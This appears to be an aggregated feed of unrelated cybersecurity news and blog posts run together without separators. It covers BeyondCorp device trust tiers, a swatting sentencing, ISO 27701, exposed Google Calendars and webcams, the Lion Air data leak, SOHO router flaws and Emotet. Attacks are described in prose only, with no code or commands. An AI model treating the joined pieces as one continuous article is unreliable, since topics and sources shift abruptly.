We should note that the system’s ability to quickly remove trust from devices can be a double edged sword. If there are bugs in the trust definitions or evaluations themselves, this can also quickly remove trust from ‘good’ devices. You must have the ability to adequately test policy changes to mitigate the blast radius from these types of bugs, and ideally canary changes to subsets of the fleet for a baking period. Constant monitoring is also critical. A bug in your trust evaluation system could cause it to start mis-evaluating trust. It’s wise to add alarms if the system starts dropping (or raising) the trust of too many machines at once. The troubleshooting section below provides additional techniques to help minimize the impact of misconfigured trust logic.

How did we define access tiers?

The basic concept of tiers is relatively straightforward: access to data increases as the device security hardening increases. These tiers are useful for coarse grain access control of client devices, which we have found to be sufficient in most cases. At Google, we allow the user to choose the device tier that allows them to weigh access needs with security requirements and policy. If a user needs access to more corporate data, they may have to accept more device configuration restrictions. If a user wants more control over their device and less restrictions but don’t need access to higher risk resources, they can choose a tier with less access to corporate data. For more information about the properties of a trusted platform you can measure, visit our paper about Maintaining a Healthy Fleet.

We knew this model would work in principle, but we didn’t know how many access tiers we should define. As described above, the old model only had two tiers: Trusted and Untrusted. We knew we wanted more than that to enable trust build up at the very least, but we didn’t know the ideal number. More tiers allow access control lists to be specified with greater fidelity at the cost of confusion for service owners, security engineers, and the wider employee base alike.

At Google, we initially supported four distinct tiers ranging from Untrusted to Highly-Privileged Access. The extremes are easy to understand: Untrusted devices should only access data that is already public while Highly-Privileged Access devices have greater privilege internally. The middle two tiers allowed system owners to design their systems with the tiered access model in mind. Certain sensitive actions required a Highly-Privileged Access device while less sensitive portions of the system could be reached with less trusted devices. This degraded access model sounded great to us security wonks. Unfortunately, employees were unable to determine what tier they should choose to ensure they could access all the systems they needed. In the end, we determined that the extra middle tier led to intense confusion without much benefit.

In our current model, the vast majority of devices fit in one of three distinct tiers: Untrusted, Basic Access, and Highly-Privileged Access. In this model, system owners are required to choose the more trusted path if their system is more sensitive. This requirement does limit the finesse of the system but greatly reduces employee confusion and was key to a successful adoption.

In addition to tiers, our system is able to provide additional context to access gateways and underlying applications and services. This additional information is useful to provide finer grained, device-based access control. Imposing additional device restrictions on highly sensitive systems, in addition to checking the coarse grain tier, is a reasonable way to balance security vs user expectations. Because highly sensitive systems are only used by a smaller subset of the employee population, based on role and need, these additional restrictions typically aren’t a source of user confusion. With that in mind, please note that this article only covers device-based controls and does not address fine-grained controls based on a user’s identity.

At the other end of the spectrum, we have OS installation/remediation services. These systems are required in order to support bootstrapping a device which by design does not yet adhere to the Basic Access tier. As described earlier, we use our certificates as a device identity, not trust validation. In the OS installation case, no reported data exists, but we can make access decisions based on the inventory data associated with that device identity. This allows us to ensure our OS and security agents are only installed on devices we own and expect to be in use. Once the OS and security agents are up and running, we can use them to lock down the device and prove it is in a state worthy of more trust.

How did we create rules to implement the tiers?

Device-based data is the heart of BeyondCorp and tiered access. We evaluate trust tiers using data about each device at Google to determine its security integrity and tier level. To obtain this data, we built an inventory pipeline which aggregates data from various sources of authority within our enterprise to obtain a holistic, comprehensive view of a device's security posture. For example, we gather prescribed company asset inventory in one service and observed data reported by agents on the devices in other services. All of this data is used to determine which tier a device belongs in, and trust tiers are reevaluated every time corporate data is changed or new data is reported.

Trust level evaluations are made via "rules", written by security and systems engineers. For example, for a device to have basic access, we have a rule that checks that it is running an approved operating system build and version. For that same device to have highly-privileged access, it would need to pass several additional rules, such as checking the device is encrypted and contains the latest security patches. Rules exist in a hierarchical structure, so several rules can combine to create a tier. Requirements for tiers across device platforms can be different, so there is a separate hierarchy for each. Security engineers work closely with systems engineers to determine the necessary information to protect devices, such as determining thresholds for required minimum version and security patch frequency.

Rule Enforcement and User Experience

To create a good user experience, rules are created and monitored before being enforced. For example, before requiring all users to upgrade their Chrome browser, we monitor how many users will drop trust if that rule was enforced. Dashboards track rule impact on Googlers over 30 day periods. This enables security and systems teams to evaluate rule change impact before they affect end users.

To further protect employee experience, we have measures called grace periods and exceptions. Grace periods provide windows of a predefined duration where devices can violate rules but still maintain trust and access, providing a fallback in case of unexpected consequences. Furthermore, grace periods can be implemented quickly and easily across the fleet in case for disaster recovery purposes. The other mechanism is called exceptions. Exceptions allow rule authors to create rules for the majority while enabling security engineers to make nuanced decisions around individual riskier processes. For example, if we have a team of Android developers specializing on user experience for an older Android version, they may be granted an exception for the minimum version rule.

How did we simplify troubleshooting?

Troubleshooting access issues proves challenging in a system where many pieces of data interact to create trust. We tackle this issue in two ways. First, we have a system to provide succinct and actionable explanations to end users on how to resolve problems on their own. Second, we have the capability to notify users when their devices have lost trust or are about to lose trust. The combination of these efforts improves the user experience of the tiered access solution and reduces toil for those supporting it.

We are able to provide self-service feedback to users by closely integrating the creation of rule policy with resolution steps for that policy. In other words, security engineers who write rule policies are also responsible for attaching steps on how to resolve the issue. To further aid users, the rule evaluation system provides details about the specific pieces of data causing the failure. All this information is fed into a centralized system that generates user-friendly explanations, guiding users to self-diagnose and fix problems without the need for IT support. Likewise, a tech may not be able to see pieces of PII about a user when helping fix the device. These cases are rare but necessary to protect the parties involved in these scenarios. Having one centralized debugging system helps deal with all these nuances, enabling us to provide detailed and safe explanations to end users in accordance with their needs.

Remediation steps are communicated to users in several ways. Before a device loses trust, notification pop-ups appear to the user explaining that a loss of access is imminent. These pop-ups contain directions to the remediation system so the user can self-diagnose and fix the problem. This circumvents user pain by offering solutions before the problem impacts the user. Premeditated notifications work in conjunction with the aforementioned grace periods, as we provide a window in which users can fix their devices. If the issue is not fixed and the device goes out of compliance, there is still a clear path on what to do. For example, when a user attempts to access a resource for which they do not have permission, a link appears on the access denied page directing them to the relevant remediation steps. This provides fast, clear feedback on how to fix their device and reduces toil on the IT support teams.

Next time

In the next and final post in this series, we will discuss how we migrated services to be protected by the BeyondCorp architecture at Google.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).


Man Who Hired Deadly Swatting Gets 15 Months

An Ohio teen who recruited a convicted serial “swatter “to fake a distress call that ended in the police shooting an innocent Kansas man in 2017 has been sentenced to 15 months in prison.

Image: FBI.gov

“Swatting” is a dangerous hoax that involves making false claims to emergency responders about phony hostage situations or bomb threats, with the intention of prompting a heavily-armed police response to the location of the claimed incident.

The tragic swatting hoax that unfolded on the night of Dec. 28, 2017 began with a dispute over a $1.50 wager in an online game “Call of Duty” between Shane M. Gaskill, a 19-year-old Wichita, Kansas resident, and Casey S. Viner, 18, from the Cincinnati, OH area.

Viner wanted to get back at Gaskill in grudge over the Call of Duty match, and so enlisted the help of another man — Tyler R. Barriss — a serial swatter in California known by the alias “SWAuTistic” who’d bragged of swatting hundreds of schools and dozens of private residences.

Chat transcripts presented by prosecutors showed Viner and Barriss both saying if Gaskill isn’t scared of getting swatted, he should give up his home address. But the address that Gaskill gave Viner to pass on to Barriss no longer belonged to him and was occupied by a new tenant.

Barriss’s fatal call to 911 emergency operators in Wichita was relayed from a local, non-emergency line. Barriss falsely claimed he was at the address provided by Viner, that he’d just shot his father in the head, was holding his mom and sister at gunpoint, and was thinking about burning down the home with everyone inside.

Wichita police quickly responded to the fake hostage report and surrounded the address given by Gaskill. Seconds later, 28-year-old Andrew Finch exited his mom’s home and was killed by a single shot from a Wichita police officer. Finch, a father of two, had no party to the gamers’ dispute and was simply in the wrong place at the wrong time.

“Swatting is not a prank, and it is no way to resolve disputes among gamers,” U.S. Attorney Stephen McAllister, said in a press statement. “Once again, I call upon gamers to self-police their community to ensure that the practice of swatting is ended once and for all.”

In chat records presented by prosecutors, Viner admitted to his role in the deadly swatting attack:

Defendant VINER: I literally said you’re gonna be swatted, and the guy who swatted him can easily say I convinced him or something when I said hey can you swat this guy and then gave him the address and he said yes and then said he’d do it for free because I said he doesn’t think anything will happen
Defendant VINER: How can I not worry when I googled what happens when you’re involved and it said a eu [sic] kid and a US person got 20 years in prison min
Defendant VINER: And he didn’t even give his address he gave a false address apparently
J.D.: You didn’t call the hoax in…
Defendant VINER: Does t [sic] even matter ?????? I was involved I asked him to do it in the first place
Defendant VINER: I gave him the address to do it, but then again so did the other guy he gave him the address to do it as well and said do it pull up etc

Barriss was sentenced earlier this year to 20 years in federal prison for his role in the fatal swatting attack.

Barriss also pleaded guilty to making hoax bomb threats in phone calls to the headquarters of the FBI and the Federal Communications Commission in Washington, D.C. In addition, he made bomb threat and swatting calls from Los Angeles to emergency numbers in Ohio, New Hampshire, Nevada, Massachusetts, Illinois, Utah, Virginia, Texas, Arizona, Missouri, Maine, Pennsylvania, New Mexico, New York, Michigan, Florida and Canada.

Prosecutors for the county that encompasses Wichita decided in April 2018 that the officer who fired the shot that killed Andrew Finch would not face charges, and would not be named because he wasn’t being charged with a crime.

Viner was sentenced after pleading guilty to one count each of conspiracy and obstructing justice, the US attorney’s office for Kansas said. CNN reports that Gaskill has been placed on deferred prosecution.

Viner’s obstruction charge stems from attempts to erase records of his communications with Barriss and the Wichita gamer, McAllister’s office said. In addition to his prison sentence, Viner was ordered to pay $2,500 in restitution and serve two years of supervised release.

Nevada Students Top First Official National Cyber League College Rankings

Nevada Students Top First Official National Cyber League College Rankings

America's National Cyber League (NCL) has published official college rankings for the very first time, and the University of Nevada has come out on top. 

Cyber-savvy students at the Reno-based university prevailed against 5,026 students from 419 schools across the nation to achieve victory in the NCL's spring 2019 season. This impressive win contributed heavily to Nevada's securing the pole position on the inaugural NCL leaderboard published last week.

In second place was the University of Hawaii at Manoa, followed by California State University at Chico, which took third. Lingering at the bottom of the board in 100th place was Grossmont College, a community college in California.  

The NCL has been challenging high school and college students to demonstrate their cybersecurity skills by taking part in two cybersecurity competitions staged annually since 2011. Entrants step onto a virtual field of competition to solve a series of puzzles based on real-world scenarios. 

Previous challenges included identifying hackers from forensic data, breaking into simulated bank websites, and staging a recovery from a ransomware attack. The University of Nevada's winning team, the Nevada Cyber Club, completed all the challenges set in this year's spring season with 99.26% accuracy. 

Club member and computer science and engineering major Bryson Lingenfelter, speaking after his team's unequivocal victory, said: "I've learned a tremendous amount in three seasons of competing in NCL, and it's a major inspiration for my plans going forward with Cyber Club. NCL is how many of us got started with the club, and I hope to expand our use of competitions as learning tools in the future to engage even more people with cybersecurity." 

Competing in the NCL does more for students than simply give them a chance to vaunt their talent and learn new skills. Thanks to industry-leading cybersecurity skills-evaluation technology from Cyber Skyline, NCL competitors can obtain scouting reports of their performance, which they can use for hiring purposes.

"Cyber competitions like NCL provide a way for cybersecurity students to demonstrate their skills to employers, especially with many entry-level jobs requiring experience," said Franz Payer, CEO of Cyber Skyline.

"The new Cyber Power Rankings highlight the top schools producing new cybersecurity professionals. We're excited for what competitions can do to help address the cyber talent shortage.

ISO 27701 unlocks the path to GDPR compliance and better data privacy

We have good news for those looking for help complying with the GDPR (General Data Protection Regulation): new guidance has been released on how to create effective data privacy controls.

ISO 27701 explains what organisations must do to when implementing a PIMS (privacy information management system).

The advice essentially bolts privacy processing controls onto ISO 27001, the international standard for information security, and provides a framework to establish the best practices required by regulations such as the GDPR.

Organisations that are already ISO 27001 compliant will only have a few extra tasks to complete, like a second risk assessment, to account for the new controls. If you’re not familiar with ISO 27001, now is the perfect time to adopt it.

ISO 27701 and ISO 27001: privacy vs security

The main difference between the two standards is that ISO 27701 deals with privacy and the implementation of a PIMS, whereas ISO 27001 addresses information security and an ISMS (information security management system).

These are related concepts – data privacy violations and information security violations are both generally categorised as data breaches. However, they aren’t identical.

  • Information security relates to the way an organisation keeps data accurate, available and accessible only to approved employees.
  • Data privacy relates to the way an organisation collects personal data and prevents unauthorised use or disclosure.

For example, if an organisation collects excessive amounts of information on an individual, that’s a privacy violation. The same is true if an unauthorised employee or cyber criminal gets hold of the data.

When building an information security framework, organisations must take extra steps to ensure that privacy concerns are accounted for alongside security issues.

ISO 27701’s approach recognises that by expanding on the clauses of ISO 27001 and controls in Annex A that relate specifically to data privacy, as well as providing two additional sets of controls specific to data controllers and data processors.

It also builds on the principle of information security by directing the reader to the more expansive privacy principles in ISO 29100. These cover a wider range of privacy concerns, including those discussed in data protection regulations internationally.

ISO 27701 and the GDPR

Although it has ‘data protection’ in its name, the GDPR is equally concerned about data privacy.

However, as you will have learned when implementing the Regulation’s requirements, the GDPR doesn’t include guidance on how to do so. This is to prevent it from becoming outdated as best practices evolve and new technologies become available.

That’s all well and good for the long-term, but what are organisations supposed to do right now?

ISO 27701 answers that question, explaining how to ensure data privacy is addressed adequately.

It’s not your only option when it comes to compliance advice, though. ISO 27701’s framework is broad, so that it can help organisations comply with multiple privacy regimes. For example, many organisations might use the Standard to meet the requirements of the CCPA (California Consumer Privacy Act).

By contrast, BS 10012 is a British standard that’s designed to help organisations comply with the GDPR and the DPA (Data Protection Act) 2018.

If your organisation needs to conform only to the GDPR and DPA 2018, you might find BS 10012 a better option.

However, if you’re looking for something more flexible – perhaps you need to assure non-UK stakeholders that you have adequate privacy controls in place – then ISO 27701 is more suitable.

Download our guide to learn more

This article is based on our free green paper ISO 27701 – Privacy information management systems.

The guide is ideal for organisations that want to advice on how to strengthen their compliance posture and those that are familiarising themselves with privacy concerns and the GDPR.

It explains:

  • How ISO 27701 differs from and complements ISO 27001;
  • The structure and requirements of ISO 27701;
  • How ISO 27701 can help you achieve compliance with privacy laws like the GDPR and the DPA 2018; and
  • Which additional requirements will apply if you already have an established ISMS.

ISO27701 guide

The post ISO 27701 unlocks the path to GDPR compliance and better data privacy appeared first on IT Governance Blog.

Experts warn of the exposure of thousands of Google Calendars online

The news is shocking, thousands of Google Calendars are leaking private information posing a severe threat to the privacy of the users.

Thousands of Google Calendars are leaking private information online threatening the privacy of the users.

Google Calendar has more than q billion users that can potentially expose their private affairs due to the implementation of an issue in the “invite” feature. It is essential to point out that this isn’t a security vulnerability in Google Calendar, but an issue that could potentially impact anyone that has ever shared his Google Calendars.

you should immediately go back to your Google settings and check if you’re exposing all your events and business activities on the Internet accessible to anyone.

The security researcher Avinash Jain discovered more than 8000 Google Calendars exposed online that were indexed by Google search engine. This means that anyone could potentially access sensitive deta and add new events that could be used to share bogus information or malicious links.

Avinash Jain contacted several media outlets, including Forbes and THN, the Indian expert works for the e-commerce firm Grofers.

“What I found is that — Using a single Google dork (advance search query), I am able to list down all the public google calendar or users who all have set their calendar as public. I found dozens of calendars which are indexed by google’s search engines, revealing or disclosing several sensitive information.” wrote the expert. “I was able to access public calendars of various organizations leaking out sensitive details like their email ids, their event name, event details, location, meeting links, zoom meeting links, google hangout links, internal presentation links and much more,”

Google Calendars

Some of the calendars belonged to employees of the top 500 Alexa company that intentionally/unintentionally were made public.

The issue is related to the public visibility set on the google calendar by the users. Google fails to send any notification to the users warning them about the visibility of their calendar.

“While this is more of an intended setting by the users and intended behavior of the service but the main issue here is that anyone can view anyone public calendar, add anything on it—just by a single search query without being shared the calendar link,” Avinash added.

The issue is not new, many experts in the last years warned of the misuse of the “make it public” feature to its web-based calendar service that was implemented 12 years ago.

The expert demonstrated that it is possible to view the exposed Google Calendars by using advanced Google search query (Google Dork).

“The fix for this: https://support.google.com/a/answer/60765?hl=en. You can set the calendars to only say Free/Busy if anyone wants to make their calendar public. GSuite admin can also create alerts for when Google docs, presentations, and calendars go public.” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – Google Calendars, privacy)

The post Experts warn of the exposure of thousands of Google Calendars online appeared first on Security Affairs.

All about U.S. tech antitrust investigations | TECH(feed)

Four large tech companies -- Apple, Amazon, Google and Facebook are under investigation in the U.S. for allegedly anticompetitive behavior. These antitrust investigations on both the federal and state levels are aimed at uncovering the practices these companies engage in to eliminate competition. In this episode of TECH(feed), Juliet discusses the House investigation into big tech and how Congress plans to investigate potential wrongdoing by these companies.

Backup files for Lion Air and parent airlines exposed and exchanged on forums

Tens of millions of records belonging to passengers of two airline companies owned by Lion Air have been exposed and exchanged on forums.

Data belonging to passengers of two airline companies owned by Lion Air have been exposed and exchanged on forums.

The information was left exposed online on an unsecured Amazon bucket, the records were stored in two databases in a directory containing backup files mostly for Malindo Air and Thai Lion Air. The most recent backup, dated May 25, is named ‘PaymentGateway.’

The directory was created in May 2019, the databases included respectively 21 million records and 14 million records. It seems that data was circulating on exchange forums since August 10.

The directory also included a backup file for the Batik Air that is owned by Lion Air. Leaked records include passenger and reservation IDs, physical addresses, phone numbers, email addresses, names, dates of birth, phone numbers, passport numbers, and passport expiration dates.

The news of the data leak was first disclosed by BleepingComputer that reported researcher Under the Breach published samples of the leaked records.

“BleepingComputer could not find an announcement from Lion Air or its subsidiary airlines about a data exposure incident.” reads the post published by BleepingComputer.

Experts noticed that data was offered on a data exchange community on August 12, then it was later secured.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Backup files for Lion Air and parent airlines exposed and exchanged on forums appeared first on Security Affairs.

The healthcare industry’s largest cyber challenges

Estimated reading time: 3 minutes

A 2018 national audit of healthcare preparedness observed that only 45 percent of businesses followed the NIST Cybersecurity Framework, a policy framework for cybersecurity guidance for private sector organizations in the United States.

No wonder then that the healthcare sector sees a tremendous penetration of cyberattacks year-after-year. A recent example of this is the theft of personal information of 14,591 patients that received medical care through Los Angeles County’s hospitals and clinics. Moreso, experts are now saying that the monetary losses to the global healthcare industry are mounting into billions, courtesy cyberattacks.

When it comes to the operational end of healthcare, the consequences of a cyber attack can be catastrophic. A cyber attack on a healthcare system can be dangerous and life-threatening – imagine critical care patients being locked out of the system. Also, considering the fact that industries in this sector store potentially vital personal information, it is even more worrisome that this sector is not investing a lot in cybersecurity.

The industry needs to act swiftly.

For stakeholders, here are some of the top cybersecurity issues facing this sector –

1.     Ransomware

Reiterating, healthcare data is a thriving breeding ground for hackers all over the world. Healthcare data primarily consists of hyper-confidential patient care details, insurance information and financial data. This information can be kidnapped and sold to an array of buyers – pharmaceutical behemoths, insurance bigwigs and banking juggernauts are just some of them.

Hence, ransomware is the preferred tactic for cyberattackers to sabotage the healthcare industry at large. Typically how this works is that hackers gain access to systems and encrypt data locking original users out. These users are then threatened that the encrypted information will be deleted or leaked unless they pay a ransom (mostly in the form of a cryptocurrency like Bitcoin). Hackers are specific to state that the data will only be freed post-payment.

2.     Insider Threats

Insider threats are certainly not a new risk anymore but their threat potential is increasing as we speak. Data is now routinely being stored in the cloud which means employees of an organization have a lot of access to sensitive data within the organization. This is compounded by the fact that humans can often be the weakest link in any cybersecurity framework.

3.     Advanced Persistent Threats (APT)

Advanced persistent threats refer to malicious campaigns where attackers breach a network and then stay there, quietly gathering intelligence about the target. They can sometimes go undetected for months or even years. The main aim of APTs is to steal sensitive confidential data. They enter an organizational network, expand their presence slowly and gather data before finally exiting. Data from the healthcare industry is exceedingly valuable – and hence cybercriminals know it’s worth it to think long-term in terms of securing this data.

4.     Mobile devices

According to statistics, 68% of healthcare security breaches were due to stolen/mobile devices. Healthcare providers are routinely using mobile devices for services such as submitting patient data, submitting bills, scheduling appointments, etc., increasing the amount of patient data being disseminated. Lost or stolen mobile data were one of the leading causes of healthcare data breaches.

5.     Spear phishing

A variation of phishing, spear phishing is a big threat to healthcare industries – just like APTs, it gives attackers access to valuable data. Hackers send a targeted email to an individual which appears to be from a trusted source. The agenda of these emails, like any other cyber fraud is to either gain access to the user’s system or obtain other classified information. Spear phishing is considered to be one of the most successful cyber-attack techniques because of the superior level of personalization done to attack users which makes it highly believable.

Stay protected against all these threats by employing Seqrite’s range of solutions which are defined by innovation and simplicity. Through a combination of intelligence, analysis of applications and state-of-the-art technology, Seqrite provides the best defence against myriad cybersecurity threats.

The post The healthcare industry’s largest cyber challenges appeared first on Seqrite Blog.

New Test Service Launched to Gauge Tech Skills of Job Candidates

New Test Service Launched to Gauge Tech Skills of Job Candidates

A new testing service has been launched with the aim of gauging and ranking job candidates based on their technical skillsets.

TechRank, created by Pioneer Labs, is run by tech consultants and sources, tests and objectively ranks tech talent, helping companies hire the best and most capable person for tech-based roles. TechRank seeks to eliminate the subjectivity of personality and interview charm and to ensure that jobs are offered based on genuine skillsets.

Candidates take the TechRank test online, opting for the specific area relevant to their skills. Candidates are then logged in the TechRank system and alerted if a suitable job is advertised. Employers can sort candidates by their skill level quicker and more accurately than reading through large numbers of CVs.

TechRank was co-founded by Gurvinder Singh, Co-CEO, Pioneer Labs, and he explained how TechRank was born out of frustration.

“We were finding it highly time-consuming and difficult to find great tech talent. It was a constant problem. So, we asked ourselves what needed to change and how this could be facilitated – the answer was clearly testing. It’s great for both the candidate and the employer. We trailed the system in our own business and found that it worked really well. It made a huge difference to Pioneer Labs so we decided to create a version that other businesses could use – and TechRank was born.”

Speaking to Infosecurity, Singh said: “We are looking to disrupt tech recruitment. We believe tech recruitment has been broken for far too long. It’s been very difficult for employers to be sure they are hiring people with the right skills; skills that are suitable for the specific job they are being asked to do. Some people look great on paper, perform brilliantly at interview, but simply don’t have the level of knowledge required for the job on offer.

“In the future, I believe CVs will become obsolete in the tech industry. Skills matter more than words and finding the best skilled people is where companies, which are trying to build or maintain market share via technology, will be competing most vigorously.”

Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors

Researchers discovered many flaws in over a dozen small office/home office (SOHO) routers and network-attached storage (NAS) devices.

Security experts have discovered multiple vulnerabilities in over a dozen small office/home office (SOHO) routers and network-attached storage (NAS) devices. The research is part of a project dubbed SOHOpelessly Broken 2.0 conducted Independent Security Evaluators (ISE).

In this phase of the project that started in 2013 (SOHOpelessly Broken 1.0), the researchers assessed the security of 13 SOHO router and NAS devices and found a total of 125 new vulnerabilities. 

“Today, we show that security controls put in place by device manufacturers are insufficient against attacks carried out by remote adversaries. This research project aimed to uncover and leverage new techniques to circumvent these new security controls in embedded devices.” reads the report published by the experts.

“Embedded devices are special-purpose computing systems. These types of systems include industrial controllers, small office/home office (SOHO) routers, network-attached storage devices (NAS), and IP cameras. Internet-connected embedded devices are often placed into a broader category referred to as IoT devices. “

The experts tested SOHO routers and NAS devices from the following vendors:

  • Buffalo
  • Synology
  • TerraMaster
  • Zyxel
  • Drobo
  • ASUS and its subsidiary Asustor
  • Seagate
  • QNAP
  • Lenovo
  • Netgear
  • Xiaomi
  • Zioncom (TOTOLINK)

The experts discovered at least one web application issue in each device they tested vulnerability that could be exploited by a remote attacker to get remote access to the device’s shell or gain access to the device’s administrative panel. 

The experts obtained root shells on 12 of the devices that allowed them to take over the vulnerable systems, 6 flaws can be remotely exploited without authentication: the Asustor AS-602T, Buffalo TeraStation TS5600D1206, TerraMaster F2-420, Drobo 5N2, Netgear Nighthawk R9000, and TOTOLINK A3002RU.

The list of flaws discovered by the researchers includes authorization bypass, authentication bypass, buffer overflow, command injection, SQL injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF), and file upload path traversal vulnerabilities.

According to the experts, the level of security for IoT devices is slightly improved since SOHOpelessly Broken 1.0, only a limited number of devices were found implementing defense-in-depth mechanisms such as like address-space layout randomization (ASLR), functionalities that hinder reverse engineering, and integrity verification mechanisms for HTTP requests.

“Perhaps more interesting is the amount of approaches that have not changed since SOHOpelessly Broken 1.0. Features such as anti-CSRF tokens and browser security headers, which are commonplace in mainstream web applications, are still rare among our sample of devices.” concludes the report. “These defense-in-depth mechanisms can greatly enhance the security posture of web applications and the underlying systems they interact with. In many cases, our remote exploits wouldn’t have worked if customary web application security practices had been implemented.”

The researchers responsibly disclosed all of the vulnerabilities they discovered to affected vendors, most of them quickly responded and addressed the issues.

Unfortunately, some manufacturers, including Drobo, Buffalo Americas, and Zioncom Holdings, did not respond to report.

Pierluigi Paganini

(SecurityAffairs – SOHOpelessly Broken, hacking)

The post Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors appeared first on Security Affairs.

Emotet Botnet Returns After Four-Month Hiatus With New Spam Campaign

The actors responsible for the Emotet botnet returned after a four-month period of inactivity with a new malspam campaign. On 16 September, SpamHaus security researcher Raashid Bhat spotted a spate of new spam emails written in Polish or German that contained malicious attachments or links to malware downloads. Emotet is fully back in action and […]… Read More

The post Emotet Botnet Returns After Four-Month Hiatus With New Spam Campaign appeared first on The State of Security.

Webcam Security Snafus Expose 15,000 Devices

Webcam Security Snafus Expose 15,000 Devices

Researchers have discovered 15,000 private webcams around the globe which could be accessed by anyone with an internet connection, raising serious security and privacy concerns.

Working for Wizcase, white hat Avishai Efrat located the exposed devices from multiple manufacturers including: AXIS net cameras; Cisco Linksys webcam; IP Camera Logo Server; IP WebCam; IQ Invision web camera; Mega-Pixel IP Camera; Mobotix; WebCamXP 5 and Yawcam.

They appear to have been installed by both home users and businesses in multiple countries across Europe, the Americas and Asia.

By failing to put in place even cursory protection on the devices, these owners are exposing not only the webcam streams themselves but also, in some cases where admin access is possible, user information and approximate geolocation. In these cases, Efrat was also theoretically able to remotely control the device view and angle.

Control of such feeds and personal info could allow attackers to rob the premises being monitored, blackmail users, and even steal PII for identity fraud.

The problem lies with the cameras’ remote access functionality. In some cases UPnP was enabled without additional protections like password authentication or IP/MAC address whitelisting, whilst in others unsecured P2P networking was used.

“Web cameras manufacturers strive to use technologies which make the device installation as seamless as possible but this sometimes results in open ports with no authentication mechanism set up. Many devices aren’t put behind firewalls, VPNs, or whitelisted IP access – any of which would deny scanners and arbitrary connections,” explained Wizcase web security expert, Chase Williams.

“If these devices have open network services, then they could be exposed.”

Wizcase urged webcam operators to change the default configuration of their device in order to: whitelist specific IP & MAC addresses to access the web camera, add strong password authentication and disable UPnP if P2P networking is being used.

It also advised users to configure a home VPN network so the webcam would no longer be exposed to the public-facing internet.

Emotet is Back and Spamming Again

Emotet is Back and Spamming Again

A notorious botnet has begun sending out spam again after a several month hiatus, which could spend bad news for organizations around the world.

Emotet has been dormant for around four months, but starting pumping out spam on Monday morning, with phishing emails sent in German, Polish, English and Italian, according to Malwarebytes.

The firm said that an uptick in command-and-control (C2) server activity forewarned it of a return to the front line for the infamous botnet.

In this new campaign, users are tricked into opening an attached document and enabling macros, triggering a PowerShell command which will try to download Emotet from compromised sites, often those running WordPress.

“Once installed on the endpoint, Emotet attempts to spread laterally, in addition to stealing passwords from installed applications. Perhaps the biggest threat, though, is that Emotet serves as a delivery vector for more dangerous payloads, such as ransomware,” warned Malwarebytes.

“Compromised machines can lay in a dormant state until operators decide to hand off the job to other criminal groups that will attempt to extort large sums of money from their victims. In the past, we’ve seen the infamous Ryuk ransomware being deployed that way.”

Linked to the North Korean Lazarus Group, Ryuk is thought to have made almost $3.8m for its operators in the six months to January 2019.

Like Trickbot, Emotet was originally a banking Trojan that was re-written to function as a malware loader. Its operators sell access to the botnet for clients to use as a malware distribution network.

According to Malwarebytes, Emotet malware was detected and removed over 1.5 million times between January and September 2018 alone. In July last year, the threat became so serious that the US-CERT was forced to release an alert about Emotet and its capabilities.

Most Port Vulnerabilities Are Found in Three Ports

Most Port Vulnerabilities Are Found in Three Ports

The vast majority of vulnerabilities in ports are found in just three, making it theoretically easier for organizations to defend them against attack, according to Alert Logic.

The security vendor analyzed 1.3 petabytes of security data, over 2.8 billion IDS events, 8.2 million verified incidents, and common vulnerabilities for more than 700 SMB customers, in order to compile its Critical Watch Report for 2019.

It claimed that 65% of vulnerabilities it found in Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) ports are linked to SSH (22/TCP), HTTPS (443/TCP) and HTTP (80/TCP).

RDP/TCP comes in fourth place, which is no surprise as it has already been patched several times by Microsoft, including one for the Bluekeep bug which Redmond warned could provide attackers with WannaCry-like “wormable” capabilities.

The number of vulnerabilities in a port is a good indication of its popularity and it’s no surprise that the top three ports for flaws are also ones exposed to the public-facing internet, Alert Logic said.

However, the findings may provide useful intel for security teams in smaller companies to help them reduce their attack surface quickly and easily.

“As basic guidance, security across all network ports should include defense-in-depth. Ports that are not in use should be closed and organizations should install a firewall on every host as well as monitor and filter port traffic,” the report advised.

“Regular port scans and penetration testing are also best practices to help ensure there are no unchecked vulnerabilities.”

Alert Logic also urged IT security teams to patch and harden any device, software or service connected to ports and to tackle any new vulnerabilities as they appear, as well as changing all default setting and passwords and running regular configuration checks.

The report found that most unpatched vulnerabilities in the SMB space are over a year old, and that misconfigurations, weak encryption and unsupported Windows versions also represent serious risks.

Security as a Service: Why Apply for SECaaS?

In today’s corporate environment, businesses and organizations rely heavily on services. This is especially true for their IT department, whose proprietary system and infrastructures can be costly to build. “As-a-service” products range in various types across all industries, and security as a service is one such product.

What Is Security as a Service (SECaaS)?

Security as a service (SECaaS) is a business model that offers companies and organizations affordable cloud-based cybersecurity services. Through SECaaS, companies and organizations no longer need to buy cybersecurity hardware or software to improve their cybersecurity system.

The company also doesn’t need to hire extra personnel to handle cybersecurity on a daily basis. In a security as a service model, the provider handles the management of the company’s cybersecurity.

Benefits of SECaaS

Security as a service is not a new business model, but cloud computing and other advancements in technology have made SECaaS a more cost-effective choice than having a heavily dedicated in-house cybersecurity group.

Below are the benefits of security as a service:

Affordability

Security as a service is the most affordable way to strengthen a company’s cybersecurity. Because SECaaS providers offer their services to multiple clients through a cloud platform, they can keep their rates low and affordable even for midsize companies.

Use of the latest cybersecurity tools

Through security as a service, companies can use the latest cybersecurity tools and software without having to buy it themselves. Their cybersecurity tools won’t fall behind industry standards, and hackers cannot use old exploits to infiltrate their system

Lower overhead cost

Since companies don’t need to hire extra personnel and buy patches for cybersecurity tools, the company has less overhead cost. In the long run, this can translate to profits that can be put into expansion or other investments.

Better data management

Through SECaaS, organizations can be sure that their data remains safe and secure. SECaaS providers monitor the movement of data across the company’s network and can detect when a user tries to access a file without permission.

Security as a Service Example

Security as a service offers a broad spectrum of cybersecurity services and solutions. Due to the wide spectrum of these services, the non-profit organization Cloud Security Alliance has outlined them into the following categories:

Network Security

Cybersecurity service that provides network access permissions while monitoring and protecting network services.

Vulnerability Scanning

Focuses on scanning and evaluating the client’s system for security vulnerabilities.

Web Security

